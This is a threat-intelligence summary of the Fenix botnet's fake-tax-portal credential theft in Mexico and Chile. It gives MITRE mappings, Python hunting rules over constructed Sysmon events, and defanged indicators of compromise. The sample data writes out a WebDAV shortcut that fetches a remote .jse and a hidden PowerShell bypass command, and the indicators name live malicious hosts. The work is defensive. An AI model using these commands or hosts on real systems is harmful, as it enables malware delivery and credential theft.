Metabase Q uncovered a LATAM-focused botnet named Fenix that targets taxpayers in Mexico and Chile through fake tax portals to steal credentials. The operation features a multi-stage infection chain, including phishing websites, a JS/JSE downloader, PowerShell and .NET payloads, and credential theft from browsers and crypto wallets. #FenixBotnet #SAT
Keypoints
- Metabase Q identifies a local actor (Mexican developers) behind the Fenix botnet, focused on Mexico and Chile with familiarity with regional government institutions.
- The campaign exploits government tax season events by redirecting victims to fraudulent portals that mimic SAT (Mexico) and SII (Chile) sites to steal credentials.
- The infection chain is multi-stage: a fake tax portal serves a ZIP containing a .url shortcut, the shortcut fetches an obfuscated JSE, the JSE downloads a PowerShell script to disk, and that script loads a .NET payload in memory.
- Fenix uses typosquatting domains, WordPress vulnerabilities, and site cloning (HTTrack) to develop phishing infrastructure and phishing campaigns.
- Credential theft targets browsers (Chrome, Opera, Edge) and crypto wallets via the stealer.crypt module.
- Metabase Q’s defense integrates threat intel, crimeware simulation, blue-team hunting, and security validation to improve detection and response.
MITRE Techniques
- [T1566.002] Phishing – Spearphishing Link – Redirects victims to fraudulent websites that mimic the official portals of the SAT in Mexico and the SII in Chile. “redirect victims to fraudulent websites that mimic the official portals of the Servicio de Administración Tributaria (SAT) in Mexico and the Servicio de Impuestos Internos (SII) in Chile.”
- [T1190] Exploit Public-Facing Application – Compromises weak websites using vulnerable WordPress engines and creates new domains to launch phishing campaigns. “It compromises weak websites using vulnerable WordPress engines and also creates new domains to launch phishing campaigns.”
- [T1105] Ingress Tool Transfer – The JSE file downloads a PowerShell script to disk and executes it. “The JSE file contains obfuscated code to make it more difficult to analyze. After deobfuscating and making the relevant substitutions, the following code downloads a Powershell script to disk and executes it.”
- [T1059.001] PowerShell – The downloaded PowerShell script loads a .NET binary in memory and executes it. “The downloaded PowerShell script loads a .NET binary in memory and executes it.”
- [T1059.007] JavaScript – The infection uses a JSE file to download and run components; the JSE file contains obfuscated code to hide its actions. “The JSE file contains obfuscated code to make it more difficult to analyze.”
- [T1055] Process Injection – The Windows binary AuthHost.exe is started in suspended mode and shellcode is then injected into it. “The Windows binary AuthHost.exe is started in suspended mode and then a shellcode is injected into it.”
- [T1112] Modify Registry – The malware modifies the registry to set up a proxy for interception of web traffic. “loads a proxy in the registry to intercept web traffic.”
- [T1555.003] Credentials from Web Browsers – The stealer.crypt module grabs credentials from browsers and crypto wallets. “stealer.crypt grabs credentials from different browsers including Chrome, Opera and Edge as well as from crypto wallets.”
- [T1036] Masquerading – Creates typosquatting domains similar to known apps like AnyDesk, WhatsApp, etc. “creates typosquatting domains similar to known apps like AnyDesk, WhatsApp, etc.”
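The stages listed above leave a small set of host-level signals: a script host running a .jse from an unusual location, PowerShell spawned by that script host, AuthHost.exe created by PowerShell and then written to from another process, and a proxy value set in the registry. The Python below, added here as an example and not code from the Metabase Q report, encodes those signals as hunting rules over Sysmon-style event records and parses an Internet shortcut of the kind the ZIP carries. The event contents, file paths and the 203.0.113.10 address are constructed; the registry path matched by the proxy rule (WinINET's Internet Settings values) is an assumption, since the report only states that a proxy is set in the registry.

```python
"""Hunting rules for the Fenix infection chain (added example, not Metabase Q's code).

Event records are constructed to resemble Sysmon events: EventID 1 = process
create, 8 = CreateRemoteThread, 13 = registry value set. Field names follow
Sysmon's schema; values, paths and the TEST-NET address are invented.
"""
import configparser
import re
from urllib.parse import urlparse

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
SCRIPT_EXT = re.compile(r"\.(jse|js|vbe|vbs|wsf)\b", re.IGNORECASE)
# Assumption: the proxy is configured through WinINET's per-user Internet Settings
# values; the report does not name the key, so adjust this to what you observe.
PROXY_VALUES = re.compile(
    r"\\Internet Settings\\(ProxyServer|ProxyEnable|AutoConfigURL)$", re.IGNORECASE)


def _base(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def _webdav_host(netloc):
    """Host part of a file:// netloc. "host@80" / "host@SSL" is the WebClient
    (WebDAV) port syntax used by the Fenix shortcut, not user@host."""
    if "@" in netloc:
        left, right = netloc.rsplit("@", 1)
        return left if right.isdigit() or right.upper() == "SSL" else right
    return netloc


def shortcut_findings(url_file_text):
    """Parse a Windows .url file (INI format) and flag a shortcut that fetches a
    script from a remote host over WebDAV, or that points straight at a script."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(url_file_text)
    url = cp.get("InternetShortcut", "URL", fallback="")
    parsed = urlparse(url)
    host = _webdav_host(parsed.netloc)
    findings = []
    if parsed.scheme == "file" and host:
        name = parsed.path.rsplit("/", 1)[-1]
        findings.append(("T1105", f"shortcut fetches {name} from {host} over WebDAV"))
    elif SCRIPT_EXT.search(parsed.path):
        findings.append(("T1105", f"shortcut points at a script: {url}"))
    return findings


def hunt(events):
    """Run the chain rules over Sysmon-like event dicts; return (technique, note) tuples."""
    findings = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 1:
            image, parent = _base(ev["Image"]), _base(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "")
            if image in SCRIPT_HOSTS and SCRIPT_EXT.search(cmd):
                findings.append(("T1059.007", f"{image} running script: {cmd}"))
            if image in POWERSHELL and parent in SCRIPT_HOSTS:
                findings.append(("T1059.001", f"PowerShell spawned by {parent}: {cmd}"))
            if image == "authhost.exe" and parent in POWERSHELL:
                findings.append(("T1055", "AuthHost.exe started by PowerShell (injection target)"))
        elif eid == 8:  # CreateRemoteThread: a thread planted in another process
            if _base(ev["TargetImage"]) == "authhost.exe":
                findings.append(("T1055", f"remote thread in AuthHost.exe from {_base(ev['SourceImage'])}"))
        elif eid == 13:  # registry value set
            if PROXY_VALUES.search(ev["TargetObject"]):
                findings.append(("T1112", f"proxy setting written: {ev['TargetObject']} = {ev.get('Details', '')}"))
    return findings


# Constructed sample data, in the order the chain would produce it.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://203.0.113.10@80/share/SAT_Herramienta_Seguridad.jse
IconIndex=0
"""
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SID = r"HKU\S-1-5-21-1111-2222-3333-1001"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\wscript.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" "\\203.0.113.10@80\share\SAT_Herramienta_Seguridad.jse"'},
    {"EventID": 1, "Image": PS, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Users\victim\AppData\Local\Temp\update.ps1"},
    {"EventID": 1, "Image": r"C:\Windows\System32\AuthHost.exe", "ParentImage": PS,
     "CommandLine": r"C:\Windows\System32\AuthHost.exe"},
    {"EventID": 8, "SourceImage": PS, "TargetImage": r"C:\Windows\System32\AuthHost.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\AuthHost.exe", "Details": "127.0.0.1:8080",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer"},
]
BENIGN_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "chrome.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe", "Details": "DWORD (0x00000001)",
     "TargetObject": SID + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"},
]

if __name__ == "__main__":
    for technique, note in shortcut_findings(SAMPLE_URL_FILE) + hunt(SAMPLE_EVENTS):
        print(technique, note)
```

Each rule on its own is noisy (administrators run .js files, PowerShell has many parents); the value is in seeing several of them on one host in sequence, which is why `hunt` returns the technique tag with each finding rather than a single verdict.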
Indicators of Compromise
- [Hashes] (MD5) – B10B9F1F286F7AE29D9E87C5391D3653, 500B1C312163009FEFEC3F8FE7861258, and 10 more hashes
- [URL] – file[:]139[.]162[.]73[.]58@80SuECWRPQSAT_Herramienta_Seguridad[.]jse, hxxps[:]//russiancl[.]top/bramx/7684jasdtg[.]xls
- [Domain] – 2repuvegobmx[.]com[.]mx, annydesk[.]website, and 10 more domains
- [IP Address] – 207.210.228[.]67, 139.162.73[.]58, and 80.66.64[.]154
- [Filenames] – SII_Seguro_XXXXXX.zip, Herramienta Seguridad SII.url, and 8 more filenames
Read more: https://www.metabaseq.com/fenix-botnet/